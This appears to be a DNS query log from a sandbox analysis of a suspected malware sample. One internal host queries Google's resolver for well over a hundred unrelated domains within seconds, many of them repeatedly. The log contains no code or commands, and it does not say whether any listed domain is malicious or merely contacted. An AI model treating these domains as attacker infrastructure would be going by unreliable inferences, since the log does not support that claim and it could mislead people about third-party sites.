                                                                                                                                                                              Sep 15, 2023 07:27:42.994724035 CEST192.168.2.38.8.8.80x39a0Standard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:42.996382952 CEST192.168.2.38.8.8.80x94c7Standard query (0)cubodown.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.056852102 CEST192.168.2.38.8.8.80xf1afStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.079920053 CEST192.168.2.38.8.8.80xb470Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.086750031 CEST192.168.2.38.8.8.80x74baStandard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.161351919 CEST192.168.2.38.8.8.80xab15Standard query (0)www.clinicasanluis.com.coA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.191598892 CEST192.168.2.38.8.8.80xedaaStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.317302942 CEST192.168.2.38.8.8.80x8cbcStandard query (0)chzko.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.325978994 CEST192.168.2.38.8.8.80xca78Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.334578991 CEST192.168.2.38.8.8.80x84Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.357186079 CEST192.168.2.38.8.8.80x424bStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.358601093 CEST192.168.2.38.8.8.80xe830Standard query (0)nels.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.405610085 CEST192.168.2.38.8.8.80xcd21Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.407912970 CEST192.168.2.38.8.8.80x1f1dStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.409586906 CEST192.168.2.38.8.8.80x6019Standard query (0)host.doA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.417004108 CEST192.168.2.38.8.8.80xd37eStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.425340891 CEST192.168.2.38.8.8.80x3ca2Standard query (0)ludomemo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.441262007 CEST192.168.2.38.8.8.80x94c7Standard query (0)kayoaiba.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.467005968 CEST192.168.2.38.8.8.80x917eStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.472362041 CEST192.168.2.38.8.8.80xb8f7Standard query (0)portoccd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.521601915 CEST192.168.2.38.8.8.80xd147Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.535037994 CEST192.168.2.38.8.8.80x7226Standard query (0)siongann.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.633244038 CEST192.168.2.38.8.8.80xd0f6Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.659410000 CEST192.168.2.38.8.8.80xcd84Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.774096966 CEST192.168.2.38.8.8.80x1b34Standard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.792748928 CEST192.168.2.38.8.8.80x9375Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.810420990 CEST192.168.2.38.8.8.80xd8faStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.820229053 CEST192.168.2.38.8.8.80x7964Standard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.845761061 CEST192.168.2.38.8.8.80x1dddStandard query (0)usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.901669979 CEST192.168.2.38.8.8.80x948Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.918370962 CEST192.168.2.38.8.8.80x63aaStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.962400913 CEST192.168.2.38.8.8.80xc494Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.990444899 CEST192.168.2.38.8.8.80xdc03Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:43.997020006 CEST192.168.2.38.8.8.80x5263Standard query (0)noblesse.beA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.105596066 CEST192.168.2.38.8.8.80xee52Standard query (0)nrsi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.146691084 CEST192.168.2.38.8.8.80x9fa4Standard query (0)n23china.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.204139948 CEST192.168.2.38.8.8.80x43caStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.231458902 CEST192.168.2.38.8.8.80x439dStandard query (0)yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.251828909 CEST192.168.2.38.8.8.80xb4b0Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.321965933 CEST192.168.2.38.8.8.80xe67Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.326800108 CEST192.168.2.38.8.8.80xf5eStandard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.344197989 CEST192.168.2.38.8.8.80xbc06Standard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.353647947 CEST192.168.2.38.8.8.80x7289Standard query (0)sidepath.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.376779079 CEST192.168.2.38.8.8.80xb11fStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.403938055 CEST192.168.2.38.8.8.80xb2d8Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.425528049 CEST192.168.2.38.8.8.80xfbe8Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.430644989 CEST192.168.2.38.8.8.80xd591Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.472090960 CEST192.168.2.38.8.8.80x1f56Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.490470886 CEST192.168.2.38.8.8.80x2f78Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.504236937 CEST192.168.2.38.8.8.80x2406Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.512228012 CEST192.168.2.38.8.8.80x9e09Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.535321951 CEST192.168.2.38.8.8.80x2c72Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.554049015 CEST192.168.2.38.8.8.80xa89fStandard query (0)scip.org.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.554049015 CEST192.168.2.38.8.8.80xf45bStandard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.564177990 CEST192.168.2.38.8.8.80x33e3Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.648010015 CEST192.168.2.38.8.8.80xc3f1Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.652451038 CEST192.168.2.38.8.8.80x392aStandard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.657450914 CEST192.168.2.38.8.8.80x781Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.706213951 CEST192.168.2.38.8.8.80x37c4Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.753391027 CEST192.168.2.38.8.8.80xe3bdStandard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.779921055 CEST192.168.2.38.8.8.80xaa62Standard query (0)lyto.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.801784992 CEST192.168.2.38.8.8.80x136eStandard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.830406904 CEST192.168.2.38.8.8.80x2306Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.845103979 CEST192.168.2.38.8.8.80x30f3Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.959739923 CEST192.168.2.38.8.8.80xf44bStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.965981007 CEST192.168.2.38.8.8.80xe58cStandard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.973459005 CEST192.168.2.38.8.8.80xf8a3Standard query (0)dspears.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:44.973669052 CEST192.168.2.38.8.8.80x35dcStandard query (0)kewlmail.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.055181980 CEST192.168.2.38.8.8.80x6304Standard query (0)listel.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.102433920 CEST192.168.2.38.8.8.80xa7dcStandard query (0)top1oil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.136718035 CEST192.168.2.38.8.8.80xcdc6Standard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.211977005 CEST192.168.2.38.8.8.80x4f06Standard query (0)assideum.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.228126049 CEST192.168.2.38.8.8.80x5e66Standard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.252477884 CEST192.168.2.38.8.8.80x2befStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.283355951 CEST192.168.2.38.8.8.80x4b89Standard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.297883034 CEST192.168.2.38.8.8.80x515aStandard query (0)willsub.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.308845043 CEST192.168.2.38.8.8.80xc418Standard query (0)nme.co.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.318188906 CEST192.168.2.38.8.8.80xb01cStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.370501041 CEST192.168.2.38.8.8.80xb96fStandard query (0)hchc.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.377553940 CEST192.168.2.38.8.8.80x45d5Standard query (0)reproar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.392076969 CEST192.168.2.38.8.8.80xb330Standard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.511253119 CEST192.168.2.38.8.8.80x2406Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.550806046 CEST192.168.2.38.8.8.80x2faaStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.654500961 CEST192.168.2.38.8.8.80x80d4Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.687881947 CEST192.168.2.38.8.8.80xd297Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.708909988 CEST192.168.2.38.8.8.80xfa6dStandard query (0)k-nikko.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.718884945 CEST192.168.2.38.8.8.80xd845Standard query (0)midap.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.729815006 CEST192.168.2.38.8.8.80x32b8Standard query (0)anduran.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.734750032 CEST192.168.2.38.8.8.80x9912Standard query (0)simetar.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.780316114 CEST192.168.2.38.8.8.80xcf94Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.788125038 CEST192.168.2.38.8.8.80xc5a8Standard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.792236090 CEST192.168.2.38.8.8.80xbefeStandard query (0)smitko.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.806751013 CEST192.168.2.38.8.8.80x9375Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.895654917 CEST192.168.2.38.8.8.80x20d5Standard query (0)gujarat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.908191919 CEST192.168.2.38.8.8.80xf264Standard query (0)angework.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.942164898 CEST192.168.2.38.8.8.80x63aaStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.948075056 CEST192.168.2.38.8.8.80xabbdStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.948518991 CEST192.168.2.38.8.8.80x57eaStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:45.994061947 CEST192.168.2.38.8.8.80xf74fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.124094009 CEST192.168.2.38.8.8.80x8a2aStandard query (0)gbmfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.197108984 CEST192.168.2.38.8.8.80xaa08Standard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.386440992 CEST192.168.2.38.8.8.80x8f53Standard query (0)wantapc.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.411161900 CEST192.168.2.38.8.8.80xcbe8Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.528431892 CEST192.168.2.38.8.8.80x2406Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.627182961 CEST192.168.2.38.8.8.80x9b5dStandard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.657697916 CEST192.168.2.38.8.8.80xf87dStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.804506063 CEST192.168.2.38.8.8.80xabacStandard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.806299925 CEST192.168.2.38.8.8.80xf8f0Standard query (0)peminet.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.808650017 CEST192.168.2.38.8.8.80x59e6Standard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.859992027 CEST192.168.2.38.8.8.80xe03aStandard query (0)leapc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:46.964308023 CEST192.168.2.38.8.8.80xabbdStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.012176037 CEST192.168.2.38.8.8.80xf74fStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.018258095 CEST192.168.2.38.8.8.80x9e4aStandard query (0)adventist.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.026248932 CEST192.168.2.38.8.8.80xbb11Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.029021978 CEST192.168.2.38.8.8.80xcd78Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.065423012 CEST192.168.2.38.8.8.80x61f2Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.096302986 CEST192.168.2.38.8.8.80xd884Standard query (0)semuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.127599955 CEST192.168.2.38.8.8.80x6416Standard query (0)redgiga.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.135565996 CEST192.168.2.38.8.8.80x3283Standard query (0)e-asset.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.190891027 CEST192.168.2.38.8.8.80x8a98Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.376188040 CEST192.168.2.38.8.8.80x969dStandard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.408953905 CEST192.168.2.38.8.8.80x3f6aStandard query (0)ccrsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.437249899 CEST192.168.2.38.8.8.80xf881Standard query (0)ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.597455025 CEST192.168.2.38.8.8.80x7ee7Standard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.641895056 CEST192.168.2.38.8.8.80x2bedStandard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.708465099 CEST192.168.2.38.8.8.80xbb9bStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.731537104 CEST192.168.2.38.8.8.80xa8c2Standard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.738935947 CEST192.168.2.38.8.8.80xc2bfStandard query (0)cnti.krsn.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.773173094 CEST192.168.2.38.8.8.80x4e4eStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.812134027 CEST192.168.2.38.8.8.80xb5d6Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.867209911 CEST192.168.2.38.8.8.80x3be9Standard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.927280903 CEST192.168.2.38.8.8.80x4f0dStandard query (0)samtv.roA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.928706884 CEST192.168.2.38.8.8.80x9adbStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.963593006 CEST192.168.2.38.8.8.80xabbdStandard query (0)com-edit.frA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:47.985450029 CEST192.168.2.38.8.8.80xac65Standard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.027688026 CEST192.168.2.38.8.8.80xbb11Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.029541969 CEST192.168.2.38.8.8.80xff28Standard query (0)awfraser.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.031936884 CEST192.168.2.38.8.8.80x714bStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.170355082 CEST192.168.2.38.8.8.80x865dStandard query (0)roewer.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.192708969 CEST192.168.2.38.8.8.80xf148Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.193922043 CEST192.168.2.38.8.8.80xf54cStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.204348087 CEST192.168.2.38.8.8.80xde0eStandard query (0)ccssinc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.228369951 CEST192.168.2.38.8.8.80x508dStandard query (0)oaith.caA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.246860981 CEST192.168.2.38.8.8.80x7bd1Standard query (0)workplus.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.267564058 CEST192.168.2.38.8.8.80x972eStandard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.297758102 CEST192.168.2.38.8.8.80x1afaStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.312422991 CEST192.168.2.38.8.8.80x8aStandard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.372201920 CEST192.168.2.38.8.8.80x522bStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.439809084 CEST192.168.2.38.8.8.80x84acStandard query (0)thiessen.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.519390106 CEST192.168.2.38.8.8.80x4653Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.520756006 CEST192.168.2.38.8.8.80x21a9Standard query (0)oozkranj.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.526341915 CEST192.168.2.38.8.8.80x2406Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.567055941 CEST192.168.2.38.8.8.80x7bb7Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.619546890 CEST192.168.2.38.8.8.80xda75Standard query (0)missnue.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.636740923 CEST192.168.2.38.8.8.80xb251Standard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.742257118 CEST192.168.2.38.8.8.80x570fStandard query (0)calvinly.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.743062019 CEST192.168.2.38.8.8.80x6206Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.746925116 CEST192.168.2.38.8.8.80x2f54Standard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.764796972 CEST192.168.2.38.8.8.80x49cStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.767268896 CEST192.168.2.38.8.8.80x2debStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.768122911 CEST192.168.2.38.8.8.80xac35Standard query (0)duiops.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.787062883 CEST192.168.2.38.8.8.80x4e4eStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.894426107 CEST192.168.2.38.8.8.80xe1efStandard query (0)juso-gr.chA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.996578932 CEST192.168.2.38.8.8.80xc0bfStandard query (0)cpmteam.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:48.996906042 CEST192.168.2.38.8.8.80xa315Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.011115074 CEST192.168.2.38.8.8.80x2be0Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.042843103 CEST192.168.2.38.8.8.80xbb11Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.046861887 CEST192.168.2.38.8.8.80x9b57Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.118508101 CEST192.168.2.38.8.8.80x49b9Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.123689890 CEST192.168.2.38.8.8.80xb6bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.172478914 CEST192.168.2.38.8.8.80x3434Standard query (0)scintel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.226732969 CEST192.168.2.38.8.8.80x45f8Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.236955881 CEST192.168.2.38.8.8.80xc2b0Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.323115110 CEST192.168.2.38.8.8.80xa70bStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.348185062 CEST192.168.2.38.8.8.80x579eStandard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.349617958 CEST192.168.2.38.8.8.80xad2fStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.362761974 CEST192.168.2.38.8.8.80x6f15Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.422333956 CEST192.168.2.38.8.8.80x1a1Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.446758032 CEST192.168.2.38.8.8.80xd616Standard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.449326038 CEST192.168.2.38.8.8.80x549bStandard query (0)araax.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.472682953 CEST192.168.2.38.8.8.80x66ceStandard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.549498081 CEST192.168.2.38.8.8.80xcaf1Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.551585913 CEST192.168.2.38.8.8.80xaafaStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.601677895 CEST192.168.2.38.8.8.80x920fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.663388014 CEST192.168.2.38.8.8.80xdbdcStandard query (0)c-drop.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.669812918 CEST192.168.2.38.8.8.80x5bceStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.748361111 CEST192.168.2.38.8.8.80xc3b2Standard query (0)alexpope.bizA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.762482882 CEST192.168.2.38.8.8.80xdfcbStandard query (0)averwin.comA (IP address)IN (0x0001)false
